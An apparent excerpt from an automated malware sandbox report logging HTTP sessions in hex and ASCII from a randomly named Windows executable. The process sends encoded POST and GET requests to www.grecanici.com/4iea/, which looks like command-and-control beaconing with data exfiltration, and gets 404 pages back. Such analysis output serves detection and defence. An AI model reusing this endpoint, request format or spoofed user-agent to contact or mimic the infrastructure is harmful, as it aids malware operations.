Jun 5, 2024 18:29:34.400929928 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 05 Jun 2024 16:29:34 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Httpd: 1 Host-Header: 8441280b0c35cbc1147f8ba998a563a7 X-Proxy-Cache-Info: DT:1 Content-Encoding: br Data Raw: 33 37 32 30 0d 0a 55 57 47 21 8a 8a 5e 0f cb 0e 30 5c 93 7a 00 54 06 c6 ee 80 58 b6 e3 7a be fd ef 7b 7f 7e ce 7b 32 ba 85 43 da 67 69 87 c8 ff fc 32 2d 3b 3f ec 2c 57 31 51 3d 3d 40 c2 7d 41 01 94 ab fd ff b7 69 15 92 ec 01 74 67 1d ce 2e 87 1b 6f 04 00 31 71 de be ef bf f7 7b 7e 49 76 ef 97 e1 9c 92 ba fb 9c d2 a0 3c 28 37 da 0b 55 5f 55 35 65 b5 dd 2b 43 03 c1 20 c9 83 9e 45 0c 37 c9 19 c3 60 92 70 29 c8 82 0d 17 fe ff 7f ef e7 27 2d 87 8c 8c 3e 80 86 1f 21 87 84 52 06 50 be 67 cf b9 db 4f 69 8c e7 5c ce 6a 64 9b 09 1a dd b7 54 67 8f ea 9c d5 4c 0e 19 3b 63 dc 2a e2 74 19 f0 29 6b 03 46 d9 07 f2 d7 78 ad 79 5c df ed 3f 09 8a 05 01 f1 1a bc ff cb e4 3d 57 ec 60 d5 c1 c2 2f a9 f5 a7 60 93 c2 ff de d7 f7 5b fb 78 be e4 29 0d 08 2f 36 37 45 41 32 94 f9 e6 87 d5 83 9c 60 f6 2b e5 21 f1 d6 16 72 58 5c 49 f0 2f fe f4 ed 11 7f d0 b1 b8 b2 80 88 a4 c3 b6 5e 4c 64 9a 95 ff bb 16 43 b6 4e f2 c0 10 62 82 da 38 49 c0 c0 6f bf 93 1a 84 b4 f7 c5 d9 ed e3 37 38 8c 6c db b6 fd fa 8d 1c 85 0d de 7f 8a 8b b3 cf cf [TRUNCATED] Data Ascii: 3720UWG!^0\zTXz{~{2Cgi2-;?,W1Q==@}Aitg.o1q{~Iv<(7U_U5e+C E7`p)'->!RPgOi\jdTgL;ct)kFxy\?=W`/`[x)/67EA2`+!rX\I/^LdCNb8Io78lw^2gD1bAxV:6b7/g_[zYpoo/&7uP"M_w`'K(%s-?EOZ&H~;}}\|@Jfo\|E9V9*\pV_3~79do#+7oon:@M86?Nn}=pe7YXB2Gr]9>Nw?pfcqov D{bVBH8MC2&2S\~W\|oO 9lQR\|@1azCTnkj&KS`_@,JjOhed&y:7yyiINhYU_G~6`aa/e0SAti\|$uy
Jun 5, 2024 18:29:34.400949001 CEST	212	IN	Data Raw: 0e 5f 12 82 a3 d0 99 8c cf 43 95 b8 7d b8 f0 6f d9 d2 6b c4 18 5d b7 b8 32 40 26 52 58 39 69 5d c2 5f a9 d4 c1 e1 67 03 49 e6 6f 9d ad f9 b8 25 93 d9 bf c4 f1 b3 56 d6 87 6f 7f 45 69 3d 53 0a 69 8c 72 58 1e 7b 2a db 55 1b 17 f7 09 25 90 8e 3c 93 Data Ascii: _C}ok]2@&RX9i]_gIo%VoEi=SirX{*U%<RZ\PcU4>a<\$&9:R^_-Xmew}Zo:keI66X2"rcV-K3x
Jun 5, 2024 18:29:34.400973082 CEST	1236	IN	Data Raw: 96 d9 3c eb ec b7 9c 6b c5 eb 37 6f 53 2d f3 6b 8e fb a3 6c 37 17 67 57 93 8a 1a a7 54 b0 ce 51 04 5e 42 d5 bf 47 26 26 59 c8 c8 a5 8a 51 7b c7 ad 6a 49 60 5a 74 58 ed e5 a4 41 87 b4 46 4b 96 b3 d4 0c 0d 68 42 ef 9a 80 67 d0 30 72 81 1c 07 5e 54 Data Ascii: <k7oS-kl7gWTQ^BG&&YQ{jI`ZtXAFKhBg0r^T-1[jsZl?[v13(ymOTO:nh!dJ;.=\w \|(]X>*h2f5RU/)z@kHTQQs
Jun 5, 2024 18:29:34.400985003 CEST	1236	IN	Data Raw: b8 ea d1 31 13 54 23 71 5c b3 04 a2 e5 8a 41 a7 55 4a 61 fd 06 12 b1 32 c1 d2 09 9c 32 c1 d5 80 4b 41 82 7d 65 93 5c ea 8e a6 9b c2 48 cd 44 d2 2b c1 1a af 4d d8 62 7e 85 58 af df 19 33 9a 52 a6 e3 da 5d 49 3c 98 ab 0b d5 43 86 c3 2c 65 1c 27 4d Data Ascii: 1T#q\AUJa22KA}e\HD+Mb~X3R]I<C,e'MX8mt4?xI.s~MM}<LA</w;Lmc<l=j,wg6z9rX1p2T*$./S$9a]){,Md^&9#
Jun 5, 2024 18:29:34.401006937 CEST	1236	IN	Data Raw: e1 24 63 08 1f 85 1b a2 0a ff d1 c4 0d 27 8f aa 23 15 5a 6b 1a ae f3 d5 4e 1e 8a e9 0a d7 1a 87 b2 ca 73 72 50 f9 54 a4 d9 4e d7 a3 81 bc 61 bf 54 67 fa b0 ac 3f 85 b9 18 a8 74 32 59 26 22 83 4c a8 c0 47 09 87 54 09 8f a8 50 7b ec a0 c3 a1 90 8e Data Ascii: $c'#ZkNsrPTNaTg?t2Y&"LGTP{HQ@ *$p(JD(%'p<'"M"ds+Vla9A6@z2%`'}a`Pjt3DQd'$8]aQ3+8&-"
Jun 5, 2024 18:29:34.401066065 CEST	636	IN	Data Raw: a1 96 e0 10 8a 25 4d 88 19 42 35 01 81 e4 98 10 12 10 1d 40 8b 1a 10 12 10 1d 05 c5 a2 61 40 48 00 34 00 2d e9 01 ea 3b 80 cb fa 94 82 fb da 2e 68 9b 5b e1 bf 5d ae b2 9e 6e 7c fd b4 d0 9a eb 22 1c 77 29 5f 62 d7 90 4b dc 90 fd ff b6 2d 64 ca 41 Data Ascii: %MB5@a@H4-;.h[]n\|"w)_bK-dA:(;Q-pj@kBR;&]04Cu.8NIsehC[~`X,i n`X!18hG[~CkX,sR-i z,kV3ZC(4!f
Jun 5, 2024 18:29:34.401087046 CEST	1236	IN	Data Raw: 80 77 5f ac 0e 88 2e 0f 29 8e fe dc bb de f2 33 ba cf 6b 56 eb 07 9a 8e fd 6a 2f f2 c9 f5 be 6c 76 41 5b b3 59 bf a3 ba 13 c7 ef b4 ef d6 fc 84 63 cb 83 63 b7 db 95 ef 42 d5 f1 51 5e ff 7e 9d f9 e2 ee 9e c4 b6 b0 b8 cb 63 a7 d7 63 8b 8a 4b fd db Data Ascii: w_.)3kVj/lvA[YccBQ^~ccK@{WR;9>4G3wf8~W]\|Os7O\;"CHB}=%%!USR-:v=zUo[p+za9&>Bhi6p$yL,A
Jun 5, 2024 18:29:34.401149988 CEST	212	IN	Data Raw: 73 92 27 68 e0 06 10 c0 49 22 00 4e 08 f6 81 8e 2c 44 27 1c d0 26 a7 7d dd 27 8f a4 fd 16 5a e6 e7 b8 2b cc ea 15 9a 0b 8e a0 7d 11 00 a4 01 ec 40 9e a0 01 11 00 24 02 00 08 f6 01 21 00 d0 5e 70 24 8d 89 a6 66 a0 6f 59 fb ea 69 e6 48 e6 fd 96 66 Data Ascii: s'hI"N,D'&}'Z+}@$!^p$foYiHf}@$!^p$yyczr?,*{MV:EyD @{/Dh_'?t xA-
Jun 5, 2024 18:29:34.401160002 CEST	1236	IN	Data Raw: 5c 0b bc 38 82 f6 97 77 31 47 48 71 d5 c4 62 15 90 d6 aa 2d 8e 60 de 17 01 50 59 28 1f cc 94 16 69 82 7d 40 04 40 e5 a1 7a 80 ca 82 60 1f 10 82 82 e2 d1 5c 85 c5 91 ec fb 42 50 50 3c 9a 57 5d 91 26 69 5f 08 8a aa 1d ad 55 56 1c c1 bc 2f 27 16 39 Data Ascii: \8w1GHqb-`PY(i}@@z`\BPP<W]&i_UV/'9dHXMe.=h%.&'$eDND:I`x8940hI;/W))KOg4i@jX!TH!!QP,@vTg
Jun 5, 2024 18:29:34.401220083 CEST	1236	IN	Data Raw: 2d d9 bb 32 0c be f3 d8 9f 48 d7 a5 42 88 ec a9 35 66 f4 4e 33 cc ff f2 b4 1e e1 f0 c4 ef 56 5e 93 4a a2 67 2d 31 53 f0 d8 f4 70 33 de ce 84 ff f8 ff 4a 3a 8c 2b a3 65 ad 30 a3 0f 04 8f eb ce 64 c7 17 9c 8f f3 d7 5b 12 8a 4f ee 0d 8e b5 c2 8c 8e Data Ascii: -2HB5fN3V^Jg-1Sp3J:+e0d[O}s~O{?F#k'vVCWmLIJ=t4+%yhzIl++h)h]iD-_z[)gSKCSYK{%yPn"V<[fE`KKcJCAJl8H~SRt
Jun 5, 2024 18:29:34.406172991 CEST	1236	IN	Data Raw: ae af d6 33 7d ff 9f 31 76 82 f5 2c 4c fe 43 cc 31 7c e0 fb c7 7f 50 cc 7f 7a a3 61 3d 72 13 4b 4c 3c 88 12 f3 f6 b6 85 cd 78 60 1a 82 69 d6 01 2a 0b 09 1f 15 13 49 a8 8b 10 8f 24 6b 05 39 c8 12 6d 20 05 75 29 08 66 86 b5 80 0c 24 5a 96 6c 27 a0 Data Ascii: 3}1v,LC1\|Pza=rKL<x`iI$k9m u)f$Zl'B8%K?;9rW+W'<Nn{uq#es!=RMMbl-.qmupWV^%Txb?&d>Gov)n/;x}n[1^rjf

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	49746	35.214.235.206	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:29:36.115288019 CEST	1738	OUT	POST /4iea/ HTTP/1.1 Host: www.grecanici.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1247 Origin: http://www.grecanici.com Referer: http://www.grecanici.com/4iea/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 47 4e 6e 7a 74 59 4e 4f 73 6c 59 31 47 4d 67 52 4e 34 46 33 68 6a 4f 52 7a 4e 45 79 66 50 34 63 6c 69 74 47 75 71 48 2f 46 56 59 4a 35 48 6f 48 44 55 59 44 4a 49 66 30 6a 63 54 4c 4b 36 67 78 45 76 57 62 37 56 74 32 6d 77 64 48 2b 52 56 61 4b 6c 39 30 35 7a 57 56 58 50 75 44 65 62 5a 47 6d 6e 4a 66 36 4c 43 6e 32 6c 45 39 30 7a 2b 2f 68 63 6b 4d 4b 6a 6e 58 49 4d 2b 72 4a 39 77 6a 57 43 50 7a 46 59 78 73 54 32 37 51 32 57 75 36 72 6a 2f 76 76 7a 31 71 2f 72 6b 65 79 46 75 6d 6d 64 34 68 6e 64 52 69 4b 4b 43 7a 5a 6b 48 50 4a 55 37 43 67 52 4c 69 37 75 63 62 7a 6e 79 4d 48 34 77 76 67 38 43 45 4e 46 68 55 63 33 53 41 4b 73 66 4d 39 47 46 43 57 51 48 36 46 67 69 36 57 56 62 61 65 48 31 4d 33 45 49 31 51 2f 6e 6f 6d 54 4a 39 47 36 36 6c 74 66 6b 4e 61 42 6b 58 62 75 42 59 67 4e 4d 53 68 44 50 74 36 67 47 72 33 56 72 70 38 54 31 6d 35 32 62 2b 4a 79 74 37 50 78 42 67 74 46 78 4d 4f 70 73 73 46 64 77 38 36 47 47 37 33 52 41 52 58 39 33 59 6d 48 61 63 6f 46 74 48 53 52 74 75 58 39 2f 50 78 48 5a [TRUNCATED] Data Ascii: 9d=GNnztYNOslY1GMgRN4F3hjORzNEyfP4clitGuqH/FVYJ5HoHDUYDJIf0jcTLK6gxEvWb7Vt2mwdH+RVaKl905zWVXPuDebZGmnJf6LCn2lE90z+/hckMKjnXIM+rJ9wjWCPzFYxsT27Q2Wu6rj/vvz1q/rkeyFummd4hndRiKKCzZkHPJU7CgRLi7ucbznyMH4wvg8CENFhUc3SAKsfM9GFCWQH6Fgi6WVbaeH1M3EI1Q/nomTJ9G66ltfkNaBkXbuBYgNMShDPt6gGr3Vrp8T1m52b+Jyt7PxBgtFxMOpssFdw86GG73RARX93YmHacoFtHSRtuX9/PxHZXagRyOIXSf1zO3vd4IMc1f0ziAs5oczOPfvCr/ie4Z5p/4Tp7stKnpDWGyTfIX1hdztHih1Tv1FJrHXrsxUr2PUi00jdJrtjojRrih0vepaRGh6H37LD4O0kSbBYeRD8eq485IfQ/PRROO3GQQrjB6WBmy1DKfGvYt1cNeDB/yIQ2JlXu60/dKZRIqqF/JecS26uHROiN4CF6Bg9r6f8V4je5QQs5U1bwOYUDUb0dLocoyupG2bvuVlzC51t7fybtvO7g8chXTVOpaGMcXvWainPv2gh1toawBFdXgWjDzi1y1i7JwwSM0izcJxZJqiRPbuP7WZ8QzZ9XmGGArKb9UGODaMk39rTSpNKQR7Q6c3SodfWxXDFV7Ufyl1Zs07R9e5ffaLg6TpZNmg0s0JmVnJzH4vIFyMbNytpd6aznO9bzgLv5yF7jwNuikFWvIENNWFrEb0u5i6qBlrOtgrpxovkoV5GH2NE4zGkTfM5W2hcIx+5XSG3cxUo5X8PFTPPo5mQw0hBFa0W2rM888Qy5YAa7rRVvJdfgOsG3oKoDYr5LGa5hBG912fotmmh5Ctr+c/wgCNHN6put8DuJ7Z5ZQh7uM3+WikJJiuvTLieJXawUso0ao3GXF3B0z3toy0jI4MW+n++YqWORT+Qq6A+DUGoTfPJsXLeTR [TRUNCATED]
Jun 5, 2024 18:29:36.950640917 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 05 Jun 2024 16:29:36 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Httpd: 1 Host-Header: 8441280b0c35cbc1147f8ba998a563a7 X-Proxy-Cache-Info: DT:1 Content-Encoding: br Data Raw: 33 37 32 30 0d 0a 55 57 47 21 8a 8a 5e 0f cb 0e 30 5c 93 7a 00 54 06 c6 ee 80 58 b6 e3 7a be fd ef 7b 7f 7e ce 7b 32 ba 85 43 da 67 69 87 c8 ff fc 32 2d 3b 3f ec 2c 57 31 51 3d 3d 40 c2 7d 41 01 94 ab fd ff b7 69 15 92 ec 01 74 67 1d ce 2e 87 1b 6f 04 00 31 71 de be ef bf f7 7b 7e 49 76 ef 97 e1 9c 92 ba fb 9c d2 a0 3c 28 37 da 0b 55 5f 55 35 65 b5 dd 2b 43 03 c1 20 c9 83 9e 45 0c 37 c9 19 c3 60 92 70 29 c8 82 0d 17 fe ff 7f ef e7 27 2d 87 8c 8c 3e 80 86 1f 21 87 84 52 06 50 be 67 cf b9 db 4f 69 8c e7 5c ce 6a 64 9b 09 1a dd b7 54 67 8f ea 9c d5 4c 0e 19 3b 63 dc 2a e2 74 19 f0 29 6b 03 46 d9 07 f2 d7 78 ad 79 5c df ed 3f 09 8a 05 01 f1 1a bc ff cb e4 3d 57 ec 60 d5 c1 c2 2f a9 f5 a7 60 93 c2 ff de d7 f7 5b fb 78 be e4 29 0d 08 2f 36 37 45 41 32 94 f9 e6 87 d5 83 9c 60 f6 2b e5 21 f1 d6 16 72 58 5c 49 f0 2f fe f4 ed 11 7f d0 b1 b8 b2 80 88 a4 c3 b6 5e 4c 64 9a 95 ff bb 16 43 b6 4e f2 c0 10 62 82 da 38 49 c0 c0 6f bf 93 1a 84 b4 f7 c5 d9 ed e3 37 38 8c 6c db b6 fd fa 8d 1c 85 0d de 7f 8a 8b b3 cf cf [TRUNCATED] Data Ascii: 3720UWG!^0\zTXz{~{2Cgi2-;?,W1Q==@}Aitg.o1q{~Iv<(7U_U5e+C E7`p)'->!RPgOi\jdTgL;ct)kFxy\?=W`/`[x)/67EA2`+!rX\I/^LdCNb8Io78lw^2gD1bAxV:6b7/g_[zYpoo/&7uP"M_w`'K(%s-?EOZ&H~;}}\|@Jfo\|E9V9*\pV_3~79do#+7oon:@M86?Nn}=pe7YXB2Gr]9>Nw?pfcqov D{bVBH8MC2&2S\~W\|oO 9lQR\|@1azCTnkj&KS`_@,JjOhed&y:7yyiINhYU_G~6`aa/e0SAti\|$uy
Jun 5, 2024 18:29:36.950654984 CEST	212	IN	Data Raw: 0e 5f 12 82 a3 d0 99 8c cf 43 95 b8 7d b8 f0 6f d9 d2 6b c4 18 5d b7 b8 32 40 26 52 58 39 69 5d c2 5f a9 d4 c1 e1 67 03 49 e6 6f 9d ad f9 b8 25 93 d9 bf c4 f1 b3 56 d6 87 6f 7f 45 69 3d 53 0a 69 8c 72 58 1e 7b 2a db 55 1b 17 f7 09 25 90 8e 3c 93 Data Ascii: _C}ok]2@&RX9i]_gIo%VoEi=SirX{*U%<RZ\PcU4>a<\$&9:R^_-Xmew}Zo:keI66X2"rcV-K3x
Jun 5, 2024 18:29:36.950803041 CEST	1236	IN	Data Raw: 96 d9 3c eb ec b7 9c 6b c5 eb 37 6f 53 2d f3 6b 8e fb a3 6c 37 17 67 57 93 8a 1a a7 54 b0 ce 51 04 5e 42 d5 bf 47 26 26 59 c8 c8 a5 8a 51 7b c7 ad 6a 49 60 5a 74 58 ed e5 a4 41 87 b4 46 4b 96 b3 d4 0c 0d 68 42 ef 9a 80 67 d0 30 72 81 1c 07 5e 54 Data Ascii: <k7oS-kl7gWTQ^BG&&YQ{jI`ZtXAFKhBg0r^T-1[jsZl?[v13(ymOTO:nh!dJ;.=\w \|(]X>*h2f5RU/)z@kHTQQs
Jun 5, 2024 18:29:36.950815916 CEST	1236	IN	Data Raw: b8 ea d1 31 13 54 23 71 5c b3 04 a2 e5 8a 41 a7 55 4a 61 fd 06 12 b1 32 c1 d2 09 9c 32 c1 d5 80 4b 41 82 7d 65 93 5c ea 8e a6 9b c2 48 cd 44 d2 2b c1 1a af 4d d8 62 7e 85 58 af df 19 33 9a 52 a6 e3 da 5d 49 3c 98 ab 0b d5 43 86 c3 2c 65 1c 27 4d Data Ascii: 1T#q\AUJa22KA}e\HD+Mb~X3R]I<C,e'MX8mt4?xI.s~MM}<LA</w;Lmc<l=j,wg6z9rX1p2T*$./S$9a]){,Md^&9#
Jun 5, 2024 18:29:36.950959921 CEST	1236	IN	Data Raw: e1 24 63 08 1f 85 1b a2 0a ff d1 c4 0d 27 8f aa 23 15 5a 6b 1a ae f3 d5 4e 1e 8a e9 0a d7 1a 87 b2 ca 73 72 50 f9 54 a4 d9 4e d7 a3 81 bc 61 bf 54 67 fa b0 ac 3f 85 b9 18 a8 74 32 59 26 22 83 4c a8 c0 47 09 87 54 09 8f a8 50 7b ec a0 c3 a1 90 8e Data Ascii: $c'#ZkNsrPTNaTg?t2Y&"LGTP{HQ@ *$p(JD(%'p<'"M"ds+Vla9A6@z2%`'}a`Pjt3DQd'$8]aQ3+8&-"
Jun 5, 2024 18:29:36.950973034 CEST	636	IN	Data Raw: a1 96 e0 10 8a 25 4d 88 19 42 35 01 81 e4 98 10 12 10 1d 40 8b 1a 10 12 10 1d 05 c5 a2 61 40 48 00 34 00 2d e9 01 ea 3b 80 cb fa 94 82 fb da 2e 68 9b 5b e1 bf 5d ae b2 9e 6e 7c fd b4 d0 9a eb 22 1c 77 29 5f 62 d7 90 4b dc 90 fd ff b6 2d 64 ca 41 Data Ascii: %MB5@a@H4-;.h[]n\|"w)_bK-dA:(;Q-pj@kBR;&]04Cu.8NIsehC[~`X,i n`X!18hG[~CkX,sR-i z,kV3ZC(4!f
Jun 5, 2024 18:29:36.950985909 CEST	1236	IN	Data Raw: 80 77 5f ac 0e 88 2e 0f 29 8e fe dc bb de f2 33 ba cf 6b 56 eb 07 9a 8e fd 6a 2f f2 c9 f5 be 6c 76 41 5b b3 59 bf a3 ba 13 c7 ef b4 ef d6 fc 84 63 cb 83 63 b7 db 95 ef 42 d5 f1 51 5e ff 7e 9d f9 e2 ee 9e c4 b6 b0 b8 cb 63 a7 d7 63 8b 8a 4b fd db Data Ascii: w_.)3kVj/lvA[YccBQ^~ccK@{WR;9>4G3wf8~W]\|Os7O\;"CHB}=%%!USR-:v=zUo[p+za9&>Bhi6p$yL,A
Jun 5, 2024 18:29:36.950997114 CEST	212	IN	Data Raw: 73 92 27 68 e0 06 10 c0 49 22 00 4e 08 f6 81 8e 2c 44 27 1c d0 26 a7 7d dd 27 8f a4 fd 16 5a e6 e7 b8 2b cc ea 15 9a 0b 8e a0 7d 11 00 a4 01 ec 40 9e a0 01 11 00 24 02 00 08 f6 01 21 00 d0 5e 70 24 8d 89 a6 66 a0 6f 59 fb ea 69 e6 48 e6 fd 96 66 Data Ascii: s'hI"N,D'&}'Z+}@$!^p$foYiHf}@$!^p$yyczr?,*{MV:EyD @{/Dh_'?t xA-
Jun 5, 2024 18:29:36.951143980 CEST	1236	IN	Data Raw: 5c 0b bc 38 82 f6 97 77 31 47 48 71 d5 c4 62 15 90 d6 aa 2d 8e 60 de 17 01 50 59 28 1f cc 94 16 69 82 7d 40 04 40 e5 a1 7a 80 ca 82 60 1f 10 82 82 e2 d1 5c 85 c5 91 ec fb 42 50 50 3c 9a 57 5d 91 26 69 5f 08 8a aa 1d ad 55 56 1c c1 bc 2f 27 16 39 Data Ascii: \8w1GHqb-`PY(i}@@z`\BPP<W]&i_UV/'9dHXMe.=h%.&'$eDND:I`x8940hI;/W))KOg4i@jX!TH!!QP,@vTg
Jun 5, 2024 18:29:36.951158047 CEST	1236	IN	Data Raw: 2d d9 bb 32 0c be f3 d8 9f 48 d7 a5 42 88 ec a9 35 66 f4 4e 33 cc ff f2 b4 1e e1 f0 c4 ef 56 5e 93 4a a2 67 2d 31 53 f0 d8 f4 70 33 de ce 84 ff f8 ff 4a 3a 8c 2b a3 65 ad 30 a3 0f 04 8f eb ce 64 c7 17 9c 8f f3 d7 5b 12 8a 4f ee 0d 8e b5 c2 8c 8e Data Ascii: -2HB5fN3V^Jg-1Sp3J:+e0d[O}s~O{?F#k'vVCWmLIJ=t4+%yhzIl++h)h]iD-_z[)gSKCSYK{%yPn"V<[fE`KKcJCAJl8H~SRt
Jun 5, 2024 18:29:36.958611012 CEST	1236	IN	Data Raw: ae af d6 33 7d ff 9f 31 76 82 f5 2c 4c fe 43 cc 31 7c e0 fb c7 7f 50 cc 7f 7a a3 61 3d 72 13 4b 4c 3c 88 12 f3 f6 b6 85 cd 78 60 1a 82 69 d6 01 2a 0b 09 1f 15 13 49 a8 8b 10 8f 24 6b 05 39 c8 12 6d 20 05 75 29 08 66 86 b5 80 0c 24 5a 96 6c 27 a0 Data Ascii: 3}1v,LC1\|Pza=rKL<x`iI$k9m u)f$Zl'B8%K?;9rW+W'<Nn{uq#es!=RMMbl-.qmupWV^%Txb?&d>Gov)n/;x}n[1^rjf

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	49747	35.214.235.206	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:29:38.655515909 CEST	448	OUT	GET /4iea/?9d=LPPTutp79E4NI/FTL4slzgCz9Mw5fMldsgpq5qffN1EY6wk4NmMiGrfPgNjCGewOe8/3zUEWliAlmzRgBncp/x6QXeu+cIhmsENqwLKbzAke2hCAvuJuIziLbcuyQtVHWzDtEtwuFhDD&G0a=VFN0vBc0ol1ljnb0 HTTP/1.1 Host: www.grecanici.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Jun 5, 2024 18:29:39.487042904 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 05 Jun 2024 16:29:39 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Httpd: 1 Host-Header: 6b7412fb82ca5edfd0917e3957f05d89 X-Proxy-Cache: MISS X-Proxy-Cache-Info: 0 NC:000000 UP: Data Raw: 31 33 64 34 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 [TRUNCATED] Data Ascii: 13d49<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="cache-control" content="no-store,max-age=0" /> <meta name="robots" content="noindex" /> <title>404 - Not found</title> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,700%7CRoboto:400,700" rel="stylesheet"><style> * { box-sizing: border-box; -moz-box-sizing: border-box; -webkit-tap-highlight-color: transparent; } body { margin: 0; padding: 0; height: 100%; -webkit-text-size-adjust: 100%; } .fit-wide { position: relative; overflow: hidden; max-width: 1240px; margin: 0 auto; padding-top: 60px; padding-bottom: 60px; padding-left: 20px; padding-right: 20px; } .background-wrap { position: rel
Jun 5, 2024 18:29:39.487085104 CEST	1236	IN	Data Raw: 61 74 69 76 65 3b 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 77 72 61 70 2e 63 6c 6f 75 64 2d 62 6c 75 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 62 30 65 30 65 39 3b 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 Data Ascii: ative; } .background-wrap.cloud-blue { background-color: #b0e0e9; } .background-wrap.white { background-color: #fff; } .title { position: relative; text-align: center; margin: 20px auto 10px; } .ti
Jun 5, 2024 18:29:39.487119913 CEST	344	IN	Data Raw: 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 2d 2d 62 67 5f 5f 63 Data Ascii: in: 0 auto; } @media screen and (max-width: 767px) { .error--bg__cover { display: none; } .abstract-half-dot--circle { left: 0; } }</style></head><body> <div id="container"> <section class="error cont
Jun 5, 2024 18:29:39.487289906 CEST	1236	IN	Data Raw: 2d 2d 62 67 5f 5f 63 6f 76 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 76 67 20 69 64 3d 22 61 63 63 65 37 36 37 30 2d 39 30 34 66 2d 34 66 38 63 2d 62 38 36 37 2d 36 38 31 33 38 63 32 66 38 63 30 36 22 20 64 Data Ascii: --bg__cover"> <svg id="acce7670-904f-4f8c-b867-68138c2f8c06" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1019 467"><title>404_bg</title><path d="M962.794,62.029a11.471,11.471,0,0,1-.656-22.923h0a11.4
Jun 5, 2024 18:29:39.487309933 CEST	1236	IN	Data Raw: 39 2c 31 30 2e 31 34 31 4c 32 38 37 2e 31 2c 32 32 37 2e 36 5a 22 20 66 69 6c 6c 3d 22 23 32 32 36 64 37 61 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 37 37 33 2e 33 31 36 2c 32 32 38 2e 33 33 61 31 2c 31 2c 30 2c 30 2c 31 2d 31 2d 31 2e 30 32 32 6c Data Ascii: 9,10.141L287.1,227.6Z" fill="#226d7a"/><path d="M773.316,228.33a1,1,0,0,1-1-1.022l.571-26.14a1,1,0,0,1,1.487-.851l24.356,13.607a1,1,0,0,1-.038,1.767l-24.926,12.532A1.006,1.006,0,0,1,773.316,228.33Zm1.535-25.456-.5,22.815,21.756-10.938Z" fill="
